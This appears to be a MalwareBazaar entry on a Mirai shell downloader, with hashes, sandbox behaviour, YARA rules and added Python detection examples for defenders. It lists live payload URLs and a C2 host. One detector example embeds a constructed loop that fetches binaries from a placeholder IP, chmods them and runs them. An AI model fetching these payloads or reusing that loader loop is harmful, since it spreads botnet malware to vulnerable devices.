MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 101d740fef21b3d8e827f9245bcbfbfd5f73273e8b6ef1125ac98539e3f8e0e2. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Mirai


Vendor detections: 8



SHA256 hash: 101d740fef21b3d8e827f9245bcbfbfd5f73273e8b6ef1125ac98539e3f8e0e2
SHA3-384 hash: 8d62f85c564de61de2bd647083faca6c6b0bbb9d0e84867963070481ad662a53b4ec4e414b4d5ac6003bc43ba8490a64
SHA1 hash: 74be0dabbcbc5ca2267090ca35eeaa061dfecb01
MD5 hash: b9ac06a1df6f5d60b5338406bd3699d2
humanhash: stairway-mars-diet-early
File name: ohshit.sh
Signature: Mirai
File size: 3'754 bytes
First seen: 2026-01-13 17:48:25 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 96:i4Pc34dc34okx340e34ey340AB34TtE34JY344e34V234m+34Sm346W34jC34u+W:XPcIdcIokxI0eIeyI0ABITiIJYI4eIVr
TLSH: T1F8714FA6CA0211781C5557B2BDBA11BAF149E3E334E7FB0FBA982CF4618DF015485DD2
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1); 30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: mirai sh
Payload URLs referenced by this script (the per-architecture binaries it downloads), with the MalwareBazaar entry for each:

URL | Malware sample (SHA256 hash) | Signature | Tags
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc | e38049a1353607de8d03af1ec86f6b12730ddc5b0567122acd8f2d9b17eb1acf | Mirai | arc elf geofenced mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86 | a913bba4af0db7a7827ffb5f1f0d3e53efba389ddeabfc1110d8248f70286b5d | Mirai | 32-bit elf mirai x86-32
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64 | 59ca6648a866cf061ecd23e25bbcf0a6d7cb8eb9627d3038eebd3be8937bfce8 | Mirai | elf geofenced mirai opendir ua-wget USA x86
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686 | b34c99612fce65d454c6506af39919fd4c458f2d82cc80ca689a61ab5128a376 | Mirai | elf geofenced mirai opendir ua-wget USA x86
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips | 965588b1f48488bbc52b4b6e09db1c6b7797f386104c2c7657cb9b8dbe0595f2 | Mirai | elf geofenced mips mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64 | n/a | n/a | n/a
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl | 6196fed0525cc2fb502f4b74be94c37f6e23fa7c9cc47422e8c9e21ef01cc37c | Mirai | elf geofenced mips mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm | 59ff2222c70bc950f82239630019acd2eb893c633eccad099f1fc87996106350 | Mirai | arm elf geofenced mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5 | dbd3e1ec8436a7fa499ca84de1b3625c0e0a6bde2d7a5771b91afaaaae154eb3 | Mirai | arm elf geofenced mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6 | 2f680107bfe926af1bf63c088a8eac43b079e52c408221e19cb8441dc6617f49 | Mirai | arm elf geofenced mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7 | a6cce14efcd5afab2356336840afd25d018cc01467fce37c42ea2e6d01a67cb4 | Mirai | arm elf geofenced mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc | 7a573f3b223d9a03146d315f349d57e26f843eb44b13f994e0645b0b84f1617e | Mirai | elf geofenced mirai opendir PowerPC ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc | n/a | n/a | n/a
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k | 01a818ba418ec11bf427485e0231f252687dc274b4ad680f977a8446afc960b2 | Mirai | elf geofenced m68k mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4 | a65f430e9456730d2a7d22e6dc9d6b8ce4430b8ae30cd6e8cb50d6fc8cf40589 | Mirai | elf geofenced mirai opendir SuperH ua-wget USA

The mips64 and sparc payloads were not captured (n/a), so the listed hashes cover 11 of the 13 architectures the loader targets.

Intelligence


File Origin
# of uploads: 1
# of downloads: 36
Origin country: DE
Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: busybox medusa mirai

Result: Gathering data

Verdict: Malicious
File Type: unix shell
First seen: 2026-01-08T19:25:00Z UTC
Last seen: 2026-01-10T12:48:00Z UTC
Hits: ~10
Detections: HEUR:Trojan-Downloader.Shell.Agent.a HEUR:Trojan-Downloader.Shell.Agent.p HEUR:Trojan-Downloader.Shell.Agent.gen
Status: terminated
Behavior Graph:
(The process and network graph is rendered as an image on the original page; only its node and edge labels survived extraction. What they show, in order:)

/usr/bin/sudo (pid 2883) execve's /tmp/sample.bin (pid 2888), the sandbox's name for this script. The script execve's /usr/bin/cp (2891) and then runs ten fetch rounds: /usr/bin/wget followed by /usr/bin/curl (both tagged net, send-data, write-file), /usr/bin/cat in the first two rounds, /usr/bin/chmod, a cloned /usr/bin/bash, and in nine of the rounds an execve of the dropped /tmp/Chaotic (tagged net, and delete-file on most runs). That is the per-architecture fetch, chmod, execute, delete loop behind the URL list above.

The first two wget/curl pairs (pids 2901/2996 and 3336/3519) send 164 B and 113 B requests to 45.83.207.173:80, the host in the URL list. From pid 4437 onward every fetch goes to weifang.serveftp.com:80 instead (wget 164-167 B, curl 113-116 B per request), so the script carries a second download host that the static URL list does not show.

Each /tmp/Chaotic instance (first: pid 3811) connects to 8.8.8.8:53 and clones five copies of itself. One child per run (first: pid 4415, tagged dns, net, send-data, zombie) queries 8.8.8.8:53 and 10.0.2.3:53 and then sends to weifang.serveftp.com:3778 (180 B in the first run, shrinking through 160, 120, 115, 105, 85 and 60 B to 50 B in the last), consistent with a bot check-in to its C2. The graph is truncated after the clone of pid 5370.
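Untangled, the graph above is a drop-and-execute chain: the script's fetch tools write a file, chmod runs, the dropped /tmp/Chaotic executes, and one of its children talks to weifang.serveftp.com:3778. The following added Python detection (my own example, not MalwareBazaar's or any vendor's code) expresses that chain as a rule over process events and runs it on a constructed event list that follows the graph's pids, images and destinations. The event field names and tag strings are this example's own convention, not the sandbox's format, and, because the graph carries no timestamps, ascending pid is used as the time order; on real telemetry you would order by timestamp instead.

```python
from collections import defaultdict
import json

# Constructed process/network events modelled on the behaviour graph for this
# sample (pids, images and destinations follow the graph; the field names and
# tag strings are this example's own convention, not the sandbox's format).
EVENTS = [
    {"pid": 2883, "ppid": 1,    "op": "execve", "image": "/usr/bin/sudo",   "tags": [], "dsts": []},
    {"pid": 2888, "ppid": 2883, "op": "execve", "image": "/tmp/sample.bin", "tags": [], "dsts": []},
    {"pid": 2891, "ppid": 2888, "op": "execve", "image": "/usr/bin/cp",     "tags": [], "dsts": []},
    {"pid": 2901, "ppid": 2888, "op": "execve", "image": "/usr/bin/wget",
     "tags": ["net", "send-data", "write-file"], "dsts": ["45.83.207.173:80"]},
    {"pid": 2996, "ppid": 2888, "op": "execve", "image": "/usr/bin/curl",
     "tags": ["net", "send-data", "write-file"], "dsts": ["45.83.207.173:80"]},
    {"pid": 3328, "ppid": 2888, "op": "execve", "image": "/usr/bin/cat",    "tags": [], "dsts": []},
    {"pid": 3330, "ppid": 2888, "op": "execve", "image": "/usr/bin/chmod",  "tags": [], "dsts": []},
    {"pid": 3332, "ppid": 2888, "op": "clone",  "image": "/usr/bin/bash",   "tags": [], "dsts": []},
    {"pid": 3811, "ppid": 2888, "op": "execve", "image": "/tmp/Chaotic",
     "tags": ["delete-file", "net"], "dsts": ["8.8.8.8:53"]},
    {"pid": 4415, "ppid": 3811, "op": "clone",  "image": "/tmp/Chaotic",
     "tags": ["dns", "net", "send-data", "zombie"],
     "dsts": ["8.8.8.8:53", "10.0.2.3:53", "weifang.serveftp.com:3778"]},
    {"pid": 4437, "ppid": 2888, "op": "execve", "image": "/usr/bin/wget",
     "tags": ["net", "send-data", "write-file"], "dsts": ["weifang.serveftp.com:80"]},
]

FETCH_TOOLS = {"wget", "curl", "tftp", "ftpget"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/", "/mnt/")


def basename(path):
    return path.rsplit("/", 1)[-1]


def by_parent(events):
    """Group events by ppid, ordered by pid (pid stands in for time here)."""
    tree = defaultdict(list)
    for e in sorted(events, key=lambda e: e["pid"]):
        tree[e["ppid"]].append(e)
    return tree


def descendants(tree, pid):
    """All events below pid in the process tree."""
    out, stack = [], [pid]
    while stack:
        for child in tree.get(stack.pop(), []):
            out.append(child)
            stack.append(child["pid"])
    return out


def detect_drop_and_exec(events):
    """Flag a parent that fetches a file, chmods, then executes a binary from a
    world-writable directory; report where it downloaded from and where the
    dropped binary and its children talk to (resolver traffic on :53 is
    filtered out so only candidate C2 endpoints remain)."""
    tree = by_parent(events)
    findings = []
    for parent, kids in tree.items():
        fetches = [k for k in kids
                   if basename(k["image"]) in FETCH_TOOLS and "write-file" in k["tags"]]
        if not fetches:
            continue
        chmods = [k["pid"] for k in kids
                  if basename(k["image"]) == "chmod" and k["pid"] > fetches[0]["pid"]]
        for k in kids:
            if k["op"] != "execve" or not k["image"].startswith(WRITABLE_DIRS):
                continue
            if not any(c < k["pid"] for c in chmods):
                continue
            talks_to = {d for e in [k] + descendants(tree, k["pid"])
                        for d in e["dsts"] if not d.endswith(":53")}
            findings.append({
                "parent": parent,
                "dropped": k["image"],
                "exec_pid": k["pid"],
                "fetch_pids": [f["pid"] for f in fetches],
                "download_hosts": sorted({d for f in fetches for d in f["dsts"]}),
                "c2_candidates": sorted(talks_to),
            })
    return findings


if __name__ == "__main__":
    print(json.dumps(detect_drop_and_exec(EVENTS), indent=2))
```

On the constructed events the rule yields one finding for parent 2888: dropped binary /tmp/Chaotic, downloads from both 45.83.207.173:80 and weifang.serveftp.com:80, and weifang.serveftp.com:3778 as the only non-resolver destination of the dropped process tree. The same three requirements (fetch with a file write, chmod, execve from a writable directory under one parent) translate directly into a Sigma or EDR correlation rule; the ordering check on pid is the part to swap for timestamps in production.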
Threat name: Linux.Downloader.Medusa
Status: Malicious
First seen: 2026-01-08 22:52:50 UTC
File Type: Text (Shell)
AV detection: 22 of 36 (61.11%)
Threat level: 3/5

Result
Malware family:
Score: 10/10
Tags: family:mirai botnet:lzrd antivm botnet defense_evasion discovery linux upx
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Checks CPU configuration
UPX packed file
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Mirai
Mirai family
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Linux_Shellscript_Downloader
Author: albertzsigovits
Description: Generic Approach to Shellscript downloaders

Rule name: MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author: Anish Bogati
Description: Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference: MalwareBazaar sample lilin.sh
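The second YARA description names the technique (download from a numeric IP, chmod, execute, one payload per architecture), and the URL list earlier on this page shows what such a payload set looks like for this sample. The following added Python script is my own example, not part of MalwareBazaar and not the logic of either YARA rule: it applies those indicators to a shell script and pulls the download URLs, numeric hosts and architecture suffixes out as IOCs. It runs against a constructed stand-in script; the host 192.0.2.10, the path, the benign comparison script and the scoring threshold are all assumptions, and the actual content of ohshit.sh is not reproduced here.

```python
import json
import re
from urllib.parse import urlparse

# Constructed stand-in for a multi-architecture loader script. It imitates the
# pattern named in the YARA description (numeric-IP download, chmod, execute,
# one payload per architecture) and is NOT the content of ohshit.sh; the host
# 192.0.2.10 and the path are placeholders.
SAMPLE_SCRIPT = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
for a in x86 x86_64 i686 mips mpsl arm arm5 arm6 arm7 ppc m68k sh4 arc; do
    wget http://192.0.2.10/loader/bot.$a -O bot || curl -o bot http://192.0.2.10/loader/bot.$a
    chmod +x bot
    ./bot
    rm -rf bot
done
"""

# Constructed benign installer for comparison: one fetch from a hostname,
# no chmod, no execution of the download.
BENIGN_SCRIPT = """#!/bin/sh
curl -fsSL https://example.com/tool.tar.gz -o /tmp/tool.tar.gz
tar -xzf /tmp/tool.tar.gz -C /opt
"""

# Suffixes Mirai-style loaders append to per-architecture payloads.
ARCH_TOKENS = {
    "x86", "x86_64", "i586", "i686", "mips", "mipsel", "mpsl", "mips64",
    "arm", "arm4", "arm5", "arm6", "arm7", "aarch64", "ppc", "powerpc",
    "m68k", "sh4", "sparc", "arc",
}

URL_RE = re.compile(r"https?://[^\s'\"`;|&<>]+")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")
EXEC_RE = re.compile(r"^\s*\./\S+", re.M)
CLEANUP_RE = re.compile(r"\brm\s+-r?f\b")


def extract_urls(script):
    """HTTP(S) URLs as written; unexpanded shell variables are kept."""
    return URL_RE.findall(script)


def numeric_hosts(urls):
    """Hosts that are bare IPv4 literals, the indicator the YARA description keys on."""
    hosts = set()
    for u in urls:
        h = urlparse(u).hostname
        if h and IPV4_RE.match(h):
            hosts.add(h)
    return sorted(hosts)


def arch_tokens(script):
    """Architecture suffixes present anywhere in the script as whole words."""
    words = set(re.findall(r"[A-Za-z0-9_]+", script))
    return sorted(words & ARCH_TOKENS)


def classify(script):
    """Score the loader indicators and return them together with extracted IOCs."""
    urls = extract_urls(script)
    hosts = numeric_hosts(urls)
    archs = arch_tokens(script)
    indicators = {
        "fetch_tool": bool(FETCH_RE.search(script)),
        "numeric_ip_download": bool(hosts),
        "chmod_executable": bool(CHMOD_RE.search(script)),
        "executes_local_file": bool(EXEC_RE.search(script)),
        "multi_arch": len(archs) >= 3,
        "self_cleanup": bool(CLEANUP_RE.search(script)),
    }
    score = sum(indicators.values())
    return {
        "urls": urls,
        "numeric_hosts": hosts,
        "architectures": archs,
        "indicators": indicators,
        "score": score,
        # The threshold is this example's choice, not a published one.
        "verdict": "loader" if score >= 4 else "unknown",
    }


if __name__ == "__main__":
    for name, s in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(name, json.dumps(classify(s), indent=2))
```

The stand-in script trips all six indicators and yields the numeric host and thirteen architecture tokens; the benign installer trips only the fetch-tool indicator. URL extraction deliberately keeps `$a` unexpanded, so on a loader that builds URLs from a variable (as here) you get one template URL rather than the expanded list, while a loader that spells out every URL (as the table for this sample suggests ohshit.sh does) yields one entry per architecture.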

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method | Signature | File type | SHA256 hash
Web download | Mirai | sh | 101d740fef21b3d8e827f9245bcbfbfd5f73273e8b6ef1125ac98539e3f8e0e2 (this sample)

Delivery method: Distributed via web download

Comments